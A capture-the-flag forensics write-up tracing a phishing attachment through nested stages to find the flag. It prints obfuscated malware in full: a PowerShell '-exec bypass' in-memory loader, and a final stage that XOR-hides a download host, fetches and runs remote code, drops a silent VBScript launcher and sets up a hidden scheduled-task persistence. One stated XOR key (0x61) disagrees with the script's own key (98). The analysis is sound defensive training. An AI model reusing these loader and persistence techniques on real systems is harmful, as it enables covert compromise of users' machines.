
Hypercraft

This email seems to have come from one of our agents, Axel Knight, but Axel has been missing for weeks, and we believe him to be compromised. The email claims to have information that could be vital to our winning this war, but before we use it, we want to make sure it is safe to open. Analyze the given email and see if it’s real, or if it’s just the Arodorians trying to phish us, and find the flag.

Files

Download: forensics_hypercraft.zip

Recon

We are handed a single .eml file. The first step in any phishing analysis is to read the raw message and inspect its headers, body, and attachments. The .eml format is just MIME, so cat shows us the structure directly.

cat hypercraft.eml
Content-Type: multipart/mixed; boundary="===============2174251299668768024=="
MIME-Version: 1.0
Delivered-To: [email protected]
From: [email protected]
To: [email protected]
Subject: Urgent - Plans for Arodorian Hypercraft

--===============2174251299668768024==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

Many Zeniumites died to recover the information provided here. Attached you'll find the schematics for the latest hypercraft spaceship under development by the Commonwealth of Arodor Maximus. These plans are more sophisticated than we expected, and show that we are at extreme risk of losing the race, and ultimately, our freedom. Please get these to our top engineers immediately, of all hope for the Zenium is lost.

I'm uploading this over a low-quality long-distance link. If the cloud copy is corrupted, try the download. You must get these plans to leadership. You're our only hope.

-- Axel
--===============2174251299668768024==
Content-Type: application/octet-stream
MIME-Version: 1.0
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="[TOP SECRET] Arodorian Hypercraft.pdf.html"

...

The message body is social-engineering flavor text, but the interesting part is the attachment: a file named [TOP SECRET] Arodorian Hypercraft.pdf.html. The double extension (.pdf.html) is a classic phishing trick to make an HTML payload look like a harmless PDF.

Unpacking the Attachment

After decoding and saving the base64 attachment, opening the HTML file produces a follow-on file: a ZIP archive named [TOP SECRET]Hypercraft Plans.zip (the HTML is only a carrier for the next stage). Extracting that archive yields a JavaScript file, which is the next stage of the payload.

Inspecting the JavaScript, we find a very long string assigned to a variable, followed by the code that consumes it. Cleaning up the variable (stripping the junk characters matched by /[sV]/g that were sprinkled through the real content) reveals another JavaScript file embedded inside.

To recover that embedded source cleanly, we pull the sourcesContent field out of the JSON-like structure with jq and pretty-print it with js-beautify.

cat TS-Arodorian3.pdf.js | jq -r '.sourcesContent[]' | js-beautify > TS-Arodorian4.pdf.js

Dynamic Analysis of the JavaScript

Rather than statically untangle the obfuscation, we run the recovered JavaScript in the browser console, executing only the portion up to the assignment of the variable named ynvjonvw (not the code that consumes it), and then inspect its value:

console.log(ynvjonvw)

Examining the decoded value, its second element contains a PowerShell command. The randomized casing (PoweRShElL -EXEcU byPAss) and the IEx(...) / DeflateStream / FromBase64String chain show this is a base64-encoded, Deflate-compressed PowerShell stage that is decompressed and executed in memory:

PoweRShElL -EXEcU  byPAss    'IEx(NEW-oBJeCT  SYsTeM.iO.COmpResSion.dEfLaTestReAm( [SySTem.IO.meMOrYStReAm] [convert]::FromBase64String(''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''),[SyStEM.IO.COMPreSSION.cOMPRessIONmodE]::DECOMPReSS)| FOrEach{NEW-oBJeCT  iO.sTReAMREaDEr( $_,[SYsTeM.TExt.eNcodiNg]::AsCii ) } ).reaDTOEnd( )'

Decoding the Compressed PowerShell Stage

To see what the next stage actually does, we replicate its own decode logic. The following PowerShell script takes the base64 blob, decodes it, decompresses it with the Deflate algorithm, and prints each line of the result:

$base64data = "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"
# Decode the base64 blob into the raw (headerless) Deflate stream the loader feeds to DeflateStream
$data = [System.Convert]::FromBase64String($base64data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0, 0) | Out-Null

# Same DeflateStream / StreamReader chain as the IEx one-liner, minus the IEx
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))

# Compare against $null rather than relying on truthiness: an empty line in the
# decompressed script would otherwise end the loop early and hide the rest of the stage
while ($null -ne ($line = $sr.ReadLine())) {
    $line
}
$sr.Close()

The same Inflate operation can be performed in CyberChef with this recipe:

https://gchq.github.io/CyberChef/#recipe=Decode_text('UTF-16LE%20(1200)'/disabled)From_Decimal('Line%20feed',false)Raw_Inflate(0,0,'Adaptive',false,false)

Deobfuscating the Final Stage

The decompressed output is yet another heavily obfuscated PowerShell script. It is full of XOR-encoded byte arrays, format-string token shuffling ("{2}{3}{1}{0}" -f ...), and backtick-broken identifiers, all standard PowerShell obfuscation techniques meant to defeat static signatures.

The key routine is UYcxq, which XOR-decodes a byte array against a single key and returns the ASCII string. We decode each variable by running sections of the script one at a time. The flag ends up living in the $aetRsdf variable.

SET-ItEM ("VAr"+"Ia"+"B"+"le:4z0")  ([TypE]("{2}{3}{1}{0}" -f'odinG','.enC','sYSTEm.T','ext')  )  ;   sv  IgF  (  [TypE]("{1}{0}{2}{3}" -f'OnVe','SYsTEM.c','r','T')  )  ;sV ('5EV'+'lS') ([type]("{1}{2}{0}" -F 'E','Io','.fIL'))  ;  &("{4}{1}{3}{0}{2}"-f 'ri','et-','ctMode','St','S') -Version 2
function UYc`xq (${TN`me},${Chk`go`Iul}) {
    for (${eum`lMx`NyUg} = 0; ${eu`mL`MxNYug} -lt ${T`NME}."c`OUnt"; ${Eu`MLMx`NyUG}++) {
       ${T`NME}[${eUM`lM`XnyuG}] = (${t`NmE}[${eUm`Lmx`N`yuG}] -bxor ${c`HKGo`iUl})
    }
    return  ( gEt-vaRIAble ("4"+"Z0")  -VaL)::"As`Cii"."gETs`T`RIng"(${tN`Me})
}
function Rc`DAt`CaJT {return (1..16 | .('%'){ '{0:X}' -f (&("{0}{2}{1}" -f 'Ge','andom','t-R') -Max 16) }) -join ''}
${E`UM`lm`XNy`UGzzOO} = (&("{0}{1}" -f 'UyC','xq') ([System.Byte[]] @(0x0a,0x16,0x16,0x12,0x58,0x4d,0x4d,0x11,0x16,0x0d,0x0e,0x07,0x0c,0x12,0x0e,0x03,0x0c,0x11,0x4c,0x0a,0x16,0x00,0x4d,0x10,0x4d)) 98)
${suQ`QsIgl} = (.("{1}{0}" -f 'Cxq','Uy') ([System.Byte[]] @(0x31,0x3c,0x36)) 80)
${X`s`xnap`VE} = (&("{1}{0}"-f'xq','UyC') ([System.Byte[]] @(0x42,0x13,0x7d,0x4c,0x4c,0x78,0x5d,0x48,0x5d,0x13,0x70,0x53,0x5f,0x5d,0x50,0x13,0x71,0x55,0x5f,0x4e,0x53,0x4f,0x53,0x5a,0x48,0x13,0x6b,0x55,0x52,0x58,0x53,0x4b,0x4f,0x13,0x6c,0x53,0x4b,0x59,0x4e,0x6f,0x54,0x59,0x50,0x50,0x13)) 60)
&('cd') ${XSx`NAp`Ve}
${cyR`YX`whqM} = (.("{1}{2}{0}" -f 't','R','cDATCAJ'))+(.("{0}{1}"-f 'UyC','xq') ([System.Byte[]] @(0x67,0x3f,0x2b,0x3a)) 73)
${N`yNG} = (.("{1}{0}" -f 'd','pw')).("{0}{1}{2}" -f 'ToStr','i','ng').Invoke() + '\' + ${cyRYXw`H`qM}
${WbwM`g`QB} = (.("{2}{1}{0}"-f 'Jt','TCA','RcDA')) + (.("{3}{1}{2}{0}" -f'Jt','AT','CA','RcD'))
${u`JRW} = $(.("{0}{1}" -f 'whoa','mi'))
${EUMLmX`NYuGS`WAb`lOEP} = (.("{1}{0}"-f'yCxq','U') ([System.Byte[]] @(0x5d,0x7d,0x45,0x3d,0x4d,0x42,0x60,0x50,0x5d,0x37,0x4e,0x74,0x67,0x4c,0x55,0x71,0x55,0x5c,0x4e,0x6a,0x60,0x53,0x35,0x68,0x66,0x6a,0x56,0x7e,0x4f,0x40,0x45,0x74,0x47,0x6a,0x4a,0x68,0x60,0x47,0x46,0x7e,0x4d,0x40,0x34,0x63,0x55,0x37,0x4e,0x68,0x5d,0x5c,0x56,0x68,0x50,0x36,0x4e,0x75,0x5e,0x53,0x4a,0x34,0x4f,0x47,0x4e,0x5c,0x51,0x36,0x4a,0x7d,0x65,0x5c,0x46,0x34,0x48,0x68,0x4a,0x6b,0x5e,0x53,0x7c,0x77,0x4d,0x6d,0x6f,0x4f,0x67,0x7d,0x31,0x57,0x60,0x53,0x30,0x63,0x4d,0x6a,0x46,0x72,0x60,0x36,0x52,0x7d,0x67,0x36,0x6c,0x68,0x66,0x43,0x73,0x71,0x5e,0x5c,0x6c,0x68,0x4d,0x47,0x35,0x68,0x61,0x43,0x52,0x6e,0x4d,0x43,0x4e,0x31,0x67,0x43,0x42,0x7e,0x67,0x7d,0x45,0x6d,0x4d,0x47,0x5d,0x63,0x5d,0x7d,0x73,0x73,0x47,0x63,0x39,0x39)) 4);
${r`ERbWtRv} =  $igf::("{1}{3}{0}{2}{4}"-f 'ase64','From','Strin','B','g').Invoke(${eu`ml`MXny`UgsW`ABl`OEp})
  (get-VariAbLe ('5EV'+'LS')  -Va)::("{1}{2}{0}" -f'ytes','wri','teallb').Invoke(${N`ynG},${ReR`Bw`TRV});
${as`kz`pH`UpAj} = (.("{0}{1}"-f'p','wd')).("{0}{1}{2}"-f'ToStr','in','g').Invoke() + '\'
${vQp`SBX`gyj} = (&("{3}{0}{2}{1}" -f 'cD','Jt','ATCA','R'))
${a`etR`sd`f} = (&("{2}{1}{0}" -f 'q', 'cx', 'UY') ([System.Byte[]] @(0x97,0x8b,0x9d,0xa4,0xb3,0xef,0xab,0xac,0x80,0xb0,0xb9,0x80,0xb3,0xeb,0x86,0xec,0xad,0xac,0x80,0xb6,0x91,0x80,0xab,0xb7,0xeb,0xab,0x80,0xee,0xa2)) 223)
${t`kqr`mLSfPD} = '"' + (&("{1}{0}"-f 'xq','UyC') ([System.Byte[]] @(0x22,0x2e,0x33,0x6b,0x63,0x22,0x3c,0x39,0x6b,0x66,0x3e,0x38,0x2e,0x29,0x6b)) 75) + "$eUmLmxNYuGZZoO$suqqSiGL/$vQpsbXGyj)" + '"'
${eRQ`cf} = &("{1}{4}{3}{6}{2}{5}{0}"-f'TaskAction','New-S','le','e','ch','d','du') -Execute "$aSKZpHuPaj$cyrYXWhqM" -Argument ${Tk`Q`Rmls`FpD}
${tpNDJP`w`Aa} = .("{1}{2}{0}{4}{6}{3}{5}"-f'h','New-S','c','edTaskPrin','edu','cipal','l') "$UJrw"
${aIuf`d`yWasr} = .("{4}{1}{5}{2}{0}{3}" -f'igge','w-Sche','askTr','r','Ne','duledT') -Once -At (&("{0}{1}"-f 'Get-D','ate')).AddDays(1) -RepetitionInterval (&("{1}{2}{0}" -f'pan','New-Time','S') -Days 1) -RepetitionDuration (.("{1}{2}{3}{0}"-f'n','New-Ti','meS','pa') -Days(365))
${d`wtTAWqx} = .("{5}{4}{0}{6}{1}{3}{2}" -f 'ledT','skS','ttingsSet','e','w-Schedu','Ne','a') -Hidden -MultipleInstances ("{0}{2}{1}" -f'Par','el','all') -AllowStartIfOnBatteries
.("{2}{1}{3}{4}{6}{0}{5}"-f 'T','egis','R','ter-','Sche','ask','duled') -TaskName ${WbWm`g`Qb} -Action ${Er`qcf} -Trigger ${AI`Uf`dY`WASr} -Settings ${dW`TTAWqx}

This stage establishes persistence: it writes out a payload, then uses Register-ScheduledTask (with a hidden, repeating trigger every day for a year) to keep running it. The XOR-encoded byte arrays decode to strings such as URLs and paths. They can be decoded in CyberChef by reading the 0x-with-comma hex and XORing with the appropriate key (here the first byte array uses key 0x61):

https://gchq.github.io/CyberChef/#recipe=From_Hex('0x%20with%20comma')XOR(%7B'option':'Hex','string':'61'%7D,'Standard',false)
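As an added example (not part of the original write-up or the sample itself), the following Python automates the three deobfuscation steps described above on lines copied verbatim from the final stage: it strips the backticks spliced into identifiers, resolves the "{1}{0}" -f token shuffles, and XOR-decodes each [System.Byte[]] array with the decimal key that follows it in the script (98, 80, 60, 73, 4, 223 and 75 for the lines used here). The regex patterns, function names and the choice of excerpt are mine; only decode_byte_arrays is independent of how the UYcxq call is spelled.

```python
import base64
import re

# Constructed excerpt: lines copied verbatim from the final PowerShell stage in the write-up.
SAMPLE = r"""
${E`UM`lm`XNy`UGzzOO} = (&("{0}{1}" -f 'UyC','xq') ([System.Byte[]] @(0x0a,0x16,0x16,0x12,0x58,0x4d,0x4d,0x11,0x16,0x0d,0x0e,0x07,0x0c,0x12,0x0e,0x03,0x0c,0x11,0x4c,0x0a,0x16,0x00,0x4d,0x10,0x4d)) 98)
${suQ`QsIgl} = (.("{1}{0}" -f 'Cxq','Uy') ([System.Byte[]] @(0x31,0x3c,0x36)) 80)
${X`s`xnap`VE} = (&("{1}{0}"-f'xq','UyC') ([System.Byte[]] @(0x42,0x13,0x7d,0x4c,0x4c,0x78,0x5d,0x48,0x5d,0x13,0x70,0x53,0x5f,0x5d,0x50,0x13,0x71,0x55,0x5f,0x4e,0x53,0x4f,0x53,0x5a,0x48,0x13,0x6b,0x55,0x52,0x58,0x53,0x4b,0x4f,0x13,0x6c,0x53,0x4b,0x59,0x4e,0x6f,0x54,0x59,0x50,0x50,0x13)) 60)
${cyR`YX`whqM} = (.("{1}{2}{0}" -f 't','R','cDATCAJ'))+(.("{0}{1}"-f 'UyC','xq') ([System.Byte[]] @(0x67,0x3f,0x2b,0x3a)) 73)
${EUMLmX`NYuGS`WAb`lOEP} = (.("{1}{0}"-f'yCxq','U') ([System.Byte[]] @(0x5d,0x7d,0x45,0x3d,0x4d,0x42,0x60,0x50,0x5d,0x37,0x4e,0x74,0x67,0x4c,0x55,0x71,0x55,0x5c,0x4e,0x6a,0x60,0x53,0x35,0x68,0x66,0x6a,0x56,0x7e,0x4f,0x40,0x45,0x74,0x47,0x6a,0x4a,0x68,0x60,0x47,0x46,0x7e,0x4d,0x40,0x34,0x63,0x55,0x37,0x4e,0x68,0x5d,0x5c,0x56,0x68,0x50,0x36,0x4e,0x75,0x5e,0x53,0x4a,0x34,0x4f,0x47,0x4e,0x5c,0x51,0x36,0x4a,0x7d,0x65,0x5c,0x46,0x34,0x48,0x68,0x4a,0x6b,0x5e,0x53,0x7c,0x77,0x4d,0x6d,0x6f,0x4f,0x67,0x7d,0x31,0x57,0x60,0x53,0x30,0x63,0x4d,0x6a,0x46,0x72,0x60,0x36,0x52,0x7d,0x67,0x36,0x6c,0x68,0x66,0x43,0x73,0x71,0x5e,0x5c,0x6c,0x68,0x4d,0x47,0x35,0x68,0x61,0x43,0x52,0x6e,0x4d,0x43,0x4e,0x31,0x67,0x43,0x42,0x7e,0x67,0x7d,0x45,0x6d,0x4d,0x47,0x5d,0x63,0x5d,0x7d,0x73,0x73,0x47,0x63,0x39,0x39)) 4);
${a`etR`sd`f} = (&("{2}{1}{0}" -f 'q', 'cx', 'UY') ([System.Byte[]] @(0x97,0x8b,0x9d,0xa4,0xb3,0xef,0xab,0xac,0x80,0xb0,0xb9,0x80,0xb3,0xeb,0x86,0xec,0xad,0xac,0x80,0xb6,0x91,0x80,0xab,0xb7,0xeb,0xab,0x80,0xee,0xa2)) 223)
${t`kqr`mLSfPD} = '"' + (&("{1}{0}"-f 'xq','UyC') ([System.Byte[]] @(0x22,0x2e,0x33,0x6b,0x63,0x22,0x3c,0x39,0x6b,0x66,0x3e,0x38,0x2e,0x29,0x6b)) 75) + "$eUmLmxNYuGZZoO$suqqSiGL/$vQpsbXGyj)" + '"'
"""

# ([System.Byte[]] @(0x..,0x..)) <key>)  -> the hex list and the decimal XOR key after it
BYTES_RE = re.compile(r"\[System\.Byte\[\]\]\s*@\(([0-9a-fA-Fx,\s]+)\)\)\s*(\d+)\)")
# ("{1}{0}" -f 'xq','UyC')  -> the format string and its single-quoted arguments
FMT_RE = re.compile(r"""\("((?:\{\d+\})+)"\s*-[fF]\s*((?:'[^']*'\s*,?\s*)+)\)""")
# (&'UyCxq' ([System.Byte[]] @(...)) 98)  once the function name has become a literal
CALL_RE = re.compile(r"\([&.]'uycxq'\s*\(" + BYTES_RE.pattern, re.I)

def uycxq(data: bytes, key: int) -> str:  # the sample's UYcxq: single-byte XOR, then ASCII
    return bytes(b ^ key for b in data).decode("ascii")

def decode_byte_arrays(text: str) -> list[str]:  # every array in the text, in script order
    return [uycxq(bytes(int(h, 16) for h in raw.split(",")), int(key))
            for raw, key in BYTES_RE.findall(text)]

def resolve_format_strings(line: str) -> str:
    """Turn ("{1}{0}" -f 'xq','UyC') into the literal 'UyCxq'."""
    def build(m: re.Match) -> str:
        args = re.findall(r"'([^']*)'", m.group(2))
        return "'" + m.group(1).format(*args) + "'"
    return FMT_RE.sub(build, line)

def deobfuscate(text: str) -> list[str]:
    """Strip identifier backticks, resolve -f strings, then inline each decoded XOR array."""
    out = []
    for line in text.strip().splitlines():
        line = resolve_format_strings(line.replace("`", ""))  # the sample has no real `n/`t escapes
        line = CALL_RE.sub(lambda m: "'" + decode_byte_arrays(m.group(0))[0].replace("'", "''") + "'", line)
        out.append(line)
    return out

def recover_launcher(b64_stage: str) -> str:  # the key-4 array is base64 of the VBScript launcher
    return base64.b64decode(b64_stage).decode("ascii")

if __name__ == "__main__":
    print("\n".join(deobfuscate(SAMPLE)), recover_launcher(decode_byte_arrays(SAMPLE)[4]), sep="\n")
```

decode_byte_arrays keys off the [System.Byte[]] literal and the trailing key alone, so it still works when the function-name shuffling changes between samples; deobfuscate goes one step further and rewrites the lines into readable PowerShell.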

Flag

Decoding the variables reveals the indicators of compromise: the download/C2 host, the persistence directory, and a small VBScript launcher used to run PowerShell silently.

http://stolenplans.htb/r/
alf
~/AppData/Local/Microsoft/Windows/PowerShell/
c = WScript.Arguments(0)
set s = CreateObject("WScript.Shell")
s.Run "powershell.exe -exec bypass " & c,0

The flag is stored in the $aetRsdf variable of this final stage: it is assigned near the end, just before the line that builds the iex (iwr ...) download of the "stolenplans" payload, but it is never referenced afterwards, so it only surfaces once its byte array is XOR-decoded:

HTB{l0ts_of_l4Y3rs_iN_th4t_1}